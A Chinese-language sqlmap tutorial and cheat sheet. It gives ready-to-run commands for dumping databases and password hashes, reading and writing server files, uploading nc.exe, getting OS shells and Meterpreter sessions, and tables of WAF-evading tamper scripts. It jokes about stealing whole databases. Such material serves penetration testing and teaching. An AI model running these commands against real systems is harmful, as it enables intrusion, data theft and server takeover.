使用经验总结
在一旦注入成功且获得精确信息通过以下详细参数来指定检索、枚举动作和动作执行对象:
检索 DBMS 的指纹特征、数据库、host 值、用户身份、并对用户、密码、权限、角色进行枚举也就是爆破。然后尝试枚举数据库、数据库里的表、数据库里的内容、可以使用 count 来统计条目等操作。dump 和 dump-all 就是脱裤和全脱的区别,dump 某表的十条八条可能没事儿,dump-all 注定要浪迹天涯,也就是所谓的从脱裤到跑路的开始,通过-D-T-C 来制定索要枚举的库、表、和列,使用-X 来排除不想要的列,特别是有多列且有无意义字段的时候,使用-X 可大大节省时间。–exclude-sysdbs 参数,将不会获取数据库自带的系统库内容,可减少干扰内容,对-count 的使用和枚举信息的使用建议搭配此参数来排除系统库。当我们不想跑路的时候,那么请使用下面内容:
–start=LIMITSTART First query output entry to retrieve指定从第几行开始输出,如:–start=1 –stop=LIMITSTOP Last query output entry to retrieve指定从第几行停止输出–stop=10 –first=FIRSTCHAR First query output word character to retrieve指定从第几个字符开始输出–first 1 –last=LASTCHARLast query output word character to retrieve指定从第几个字符停止输出–last10
复制代码
对文件系统、操作系统的交互和使用必须需要相应的权限,前面提到要求具有特定的函数执行特权,一般要求 root。针对文件系统的读写:对–file-read 配置绝对系统路径,可读取相应文件内容,可以是文本,也可以是二进制,条件是必须拥有相对应特权,已知的是 mysql、postgresql 和 sqlserver。写入也是同样,往远端后台的 DBMS 里写入一个本地文件,可通过–file-dest 指定绝对文件路径。” 当然和上面可以配合使用,当数据库为 MySQL,PostgreSQL 或 Microsoft SQL Server,并且当前用户有权限使用特定的函数。然后通过上面的文件系统管理上传一个库,使用可执行系统命令的 sys_exec()和 sys_eval(),甚至 xp_cmdshell 存储过程 –os-shell 参数也可以模拟一个真实的 shell,可以输入你想执行的命令。Meterpreter 配合使用 –os-pwn,–os-smbrelay,–os-bof,–priv-esc,–msf-path,–tmp-path 配合 Meterpreter 使用,当前用户有权限使用特定的函数,可以在数据库与攻击者直接建立 TCP 连接,这个连接可以是一个交互式命令行的 Meterpreter 会话,sqlmap 根据 Metasploit 生成 shellcode,四种方式执行它:
1.通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode,支持MySQL和PostgreSQL数据库,参数:–os-pwn。2.通过用户自定义的函数上传一个独立的payload执行,MySQL和PostgreSQL的sys_exec()函数,Microsoft SQL Server的xp_cmdshell()函数,参数:–os-pwn。3.通过SMB攻击(MS08-068)来执行Metasploit的shellcode,当sqlmap获取到的权限足够高的时候(Linux/Unix的uid=0,Windows是Administrator),–os-smbrelay。4.通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004),在内存中执行Metasploit的payload,参数:–os-bof。
复制代码
当前用户有权限读取包含用户密码的权限时,sqlmap 会现列举出用户,然后列出 hash,并尝试破解。
sqlmap.py -u ” http://127.0.0.1/get_int.php?id=1 ” –passwords
复制代码
使用技巧
基础检测语法
sqlmap.py -u http://127.0.0.1/user_info.php?uid=1 024
复制代码
批量检测
“sqlmap.py -m target.txt”
复制代码
注意 target.txt 跟 sqlmap 在同一个目录下。
获取表中的数据个数
sqlmap.py -u ” http://www.potian.com/sqlmap/mssql/iis/get_int.asp?id=1 ” –count -Dtestdb
复制代码
站点爬取
sqlmap.py -u “ http://www.secbang.com “–batch –crawl=3
复制代码
使用 hex 避免字符编码导致数据丢失
sqlmap.py -u “ http://www.secbang.com/pgsql/get_int.php?id=1 ” –banner –hex -v 3 –parse-errors
复制代码
模拟测试手机环境站点
python sqlmap.py -u ” http://www.secbang.com/vuln.php?id=1 ” –mobile
复制代码
智能判断测试
sqlmap.py -u “ http://www.secbang.com/info.php?id=1 “–batch –smart
复制代码
结合 burpsuite 进行注入
sqlmap.py -r burpsuite 抓包.txt
复制代码
sqlmap 自动填写表单注入
执行 shell 命令
sqlmap.py -u “url” –os-cmd=”netuser” /*执行net user命令*/ sqlmap.py -u “url” –os-shell /*系统交互的shell*/
复制代码
延时注入
sqlmap –dbs -u”url” –delay 0.5 /* 延时0.5秒*/ sqlmap –dbs -u”url” –safe-freq /* 请求2次*/
复制代码
实用技巧
这些选项可用于调整具体的 SQL 注入测试
–technique=TECH SQL注入技术测试(默认BEUST)
–time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
–union-cols=UCOLS 定列范围用于测试UNION查询注入
–union-char=UCHAR 暴力猜测列的字符数
–union-from=UFROM SQL注入UNION查询使用的格式
–dns-domain=DNS.. DNS泄露攻击使用的域名
–second-order=S.. URL搜索产生的结果页面
复制代码
枚举信息
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行自定义的 SQL 语句。
-a, –all 获取所有信息
-b, –banner 获取数据库管理系统的标识
–current-user 获取数据库管理系统当前用户
–current-db 获取数据库管理系统当前数据库
–hostname 获取数据库服务器的主机名称
–is-dba 检测DBMS当前用户是否DBA
–users 枚举数据库管理系统用户
–passwords 枚举数据库管理系统用户密码哈希
–privileges 枚举数据库管理系统用户的权限
–roles 枚举数据库管理系统用户的角色
–dbs 枚举数据库管理系统数据库
–tables 枚举的DBMS数据库中的表
–columns 枚举DBMS数据库表列
–schema 枚举数据库架构
–count 检索表的项目数,有时候用户只想获取表中的数据个数而不是具体的内容,那么就可以使用这个参数:sqlmap.py -u url –count -D testdb
–dump 转储数据库表项
–dump-all 转储数据库所有表项
–search 搜索列(S),表(S)和/或数据库名称(S)
–comments 获取DBMS注释
-D DB 要进行枚举的指定数据库名
-T TBL DBMS数据库表枚举
-C COL DBMS数据库表列枚举
-X EXCLUDECOL DBMS数据库表不进行枚举
-U USER 用来进行枚举的数据库用户
–exclude-sysdbs 枚举表时排除系统数据库
–pivot-column=P.. Pivot columnname
–where=DUMPWHERE Use WHEREcondition while table dumping
–start=LIMITSTART 获取第一个查询输出数据位置
–stop=LIMITSTOP 获取最后查询的输出数据
–first=FIRSTCHAR 第一个查询输出字的字符获取
–last=LASTCHAR 最后查询的输出字字符获取
–sql-query=QUERY 要执行的SQL语句
–sql-shell 提示交互式SQL的shell
–sql-file=SQLFILE 要执行的SQL文件
复制代码
访问文件系统
这些选项可以被用来访问后端数据库管理系统的底层文件系统
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件,SQL Server2005中读取二进制文件example.exe:
sqlmap.py -u”http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther“–file-read “C:/example.exe” -v 1
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
在kali中将/software/nc.exe文件上传到C:/WINDOWS/Temp下:
python sqlmap.py -u”http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1” –file-write”/software/nc.exe” –file-dest “C:/WINDOWS/Temp/nc.exe” -v1
复制代码
操作系统访问
这些选项可以用于访问后端数据库管理系统的底层操作系统
–os-cmd=OSCMD 执行操作系统命令(OSCMD)
–os-shell 交互式的操作系统的shell
–os-pwn 获取一个OOB shell,meterpreter或VNC
–os-smbrelay 一键获取一个OOBshell,meterpreter或VNC
–os-bof 存储过程缓冲区溢出利用
–priv-esc 数据库进程用户权限提升
–msf-path=MSFPATH MetasploitFramework本地的安装路径
–tmp-path=TMPPATH 远程临时文件目录的绝对路径
复制代码
Windows 注册表访问
这些选项可以被用来访问后端数据库管理系统 Windows 注册表
–reg-read 读一个Windows注册表项值
–reg-add 写一个Windows注册表项值数据
–reg-del 删除Windows注册表键值
–reg-key=REGKEY Windows注册表键
–reg-value=REGVAL Windows注册表项值
–reg-data=REGDATA Windows注册表键值数据
–reg-type=REGTYPE Windows注册表项值类型
复制代码
Tamper 功能
序号 脚本名称 注释1 0x2char 将每个编码后的字符转换为等价表达2 apostrophemask 单引号替换为Utf8字符3 apostrophenullencode 替换双引号为%00%274 appendnullbyte 有效代码后添加%005 base64encode 使用base64编码6 between 比较符替换为between7 bluecoat 空格替换为随机空白字符,等号替换为like8 chardoubleencode 双url编码9 charencode 将url编码10 charunicodeencode 使用unicode编码11 charunicodeescape 以指定的payload反向编码未编码的字符12 commalesslimit 改变limit语句的写法13 commalessmid 改变mid语句的写法14 commentbeforeparentheses 在括号前加内联注释15 concat2concatws 替换CONCAT为CONCAT_WS16 equaltolike 等号替换为like17 escapequotes 双引号替换为\\\\18 greatest 大于号替换为greatest19 halfversionedmorekeywords 在每个关键字前加注释20 htmlencode html编码所有非字母和数字的字符21 ifnull2casewhenisnull 改变ifnull语句的写法22 ifnull2ifisnull 替换ifnull为if(isnull(A))23 informationschemacomment 标示符后添加注释24 least 替换大于号为least25 lowercase 全部替换为小写值26 modsecurityversioned 空格替换为查询版本的注释27 modsecurityzeroversioned 添加完整的查询版本的注释28 multiplespaces 添加多个空格29 nonrecursivereplacement 替换预定义的关键字30 overlongutf8 将所有字符转义为utf831 overlongutf8more 以指定的payload转换所有字符32 percentage 每个字符前添加%33 plus2concat 将加号替换为concat函数34 plus2fnconcat 将加号替换为ODBC函数{fn CONCAT()}35 randomcase 字符大小写随机替换36 randomcomments /**/分割关键字37 securesphere 添加某字符串38 sp_password 追加sp_password字符串39 space2comment 空格替换为/**/40 space2dash 空格替换为–加随机字符41 space2hash 空格替换为#加随机字符42 space2morecomment 空格替换为/**_**/43 space2morehash 空格替换为#加随机字符及换行符44 space2mssqlblank 空格替换为其他空符号45 space2mssqlhash 空格替换为%23%0A46 space2mysqlblank 空格替换为其他空白符号47 space2mysqldash 空格替换为–%0A48 space2plus 空格替换为加号49 space2randomblank 空格替换为备选字符集中的随机字符50 symboliclogical AND和OR替换为&&和||51 unionalltounion union all select替换为union select52 unmagicquotes 宽字符绕过GPC53 uppercase 全部替换为大写值54 varnish 添加HTTP头55 versionedkeywords 用注释封装每个非函数的关键字56 versionedmorekeywords 使用注释绕过57 xforwardedfor 添加伪造的HTTP头
复制代码
MYSQL 常用 Tamper
版本 可用tamper编号 脚本名称4/5.0/5.5 1 0x2char6 between9 charencode16 concat2concatws18 greatest24 least25 lowercase35 randomcase39 space2comment49 space2randomblank53 uppercase5.1 7 bluecoat46 space2mysqlblank5.0/5.5 12 commalesslimit13 commalessmid21 ifnull2casewhenisnull22 ifnull2ifisnull42 space2morecomment5.0 15 concat2concatws26 modsecurityversioned27 modsecurityzeroversioned4.0/5.0 41 space2hash5.1.56 10 charunicodeencode5.1.56/5.5.11 32 percentage56 versionedmorekeywords4.0.18/5.0.22 19 halfversionedmorekeywords4.0.18/5.1.56/5.5.11 55 versionedkeywords5.1.41 43 space2morehash未指定版本 14 commentbeforeparentheses40 space2dash45 space2mssqlhash47 space2mysqldash
复制代码
SQLServer 常用 Tamper
版本 可用tamper编号 脚本名称2005/2000 10 charunicodeencode32 percentage44 space2mssqlblank2005 6 between9 charencode16 equaltolike25 lowercase35 randomcase39 space2comment49 space2randomblank53 uppercase2002+ 33 plus2concat2008+ 34 plus2fnconcat未指定 14 commentbeforeparentheses
复制代码
ACCESS 常用 Tamper
版本 可用tamper编号 脚本名称未指定 4 appendnullbyte
复制代码
Oracle 常用 Tamper
版本 可用tamper编号 脚本名称10g 6 between9 charencode14 commentbeforeparentheses18 greatest24 least25 lowercase35 randomcase39 space2comment49 space2randomblank53 uppercase
复制代码
PostgreSQL 常用 Tamper
版本 可用tamper编号 脚本名称8.3/8.4/9.0 6 between9 charencode18 greatest24 least25 lowercase39 space2comment49 space2randomblank53 uppercase9.0 32 percentage9.0.3 10 charunicodeencode未指定 14 commentbeforeparentheses35 randomcase
复制代码
SQLite 常用 Tamper
版本 可用tamper编号 脚本名称未指定 40 space2dash
复制代码
未知适用范围常用 Tamper
若以上脚本未解决问题,可尝试使用一下脚本。
版本 可用tamper编号 脚本名称 2 apostrophemask3 apostrophenullencode5 base64encode8 chardoubleencode11 charunicodeescape17 escapequotes20 htmlencode23 informationschemacomment28 multiplespaces29 nonrecursivereplacement30 overlongutf831 overlongutf8more36 randomcomments37 securesphere48 space2plus50 symboliclogical51 unionalltounion52 unmagicquotes54 varnish57 xforwardedfor
复制代码
优化功能
这些选项可用于优化 sqlmap 性能
-o 打开所有的优化开关
–predict-output 预测普通查询输出
–keep-alive 使用持久HTTP(S)连接
–null-connection 获取页面长度
–threads=THREADS 当前http(s)最大请求数 (默认 1)
复制代码
指定注入
这些选项可用于指定要测试的参数、提供自定义注入有效载荷和可选的篡改脚本。
-p TESTPARAMETER 可测试的参数
–skip=SKIP 跳过对给定参数的测试
–skip-static 跳过测试不显示为动态的参数
–param-exclude=.. 使用正则表达式排除参数进行测试(e.g. “ses”)
–dbms=DBMS 强制后端的DBMS为此值
–dbms-cred=DBMS.. DBMS认证凭证(user:password)
–os=OS 强制后端的DBMS操作系统为这个值
–invalid-bignum 使用大数字使值无效
–invalid-logical 使用逻辑操作使值无效
–invalid-string 使用随机字符串使值无效
–no-cast 关闭有效载荷铸造机制
–no-escape 关闭字符串逃逸机制
–prefix=PREFIX 注入payload字符串前缀
–suffix=SUFFIX 注入payload字符串后缀
–tamper=TAMPER 使用给定的脚本篡改注入数据
复制代码
小坑
在批量扫验证的时候,发现不同版本号扫描的结果不一样,1.2.11.6 版本可以扫出来数据,但是 1.3.4 版本就没办法,在网上有师傅指出问题出在:
经过分析,两坑如下:(1)v1.2.11(/v1.2.10/v1.2.9/master)的boundaries.xml没有了针对模糊查询(%)的测试,而v1.2(/v1.1.12/1.1.4/1.2.2)则有。(2)v1.2.11(/v1.2.10/1.2.9/master)必须手动设置json的某个参数为*才能对这个参数进行注入,否则payload直接跟在json后导致无法注入,
复制代码
评论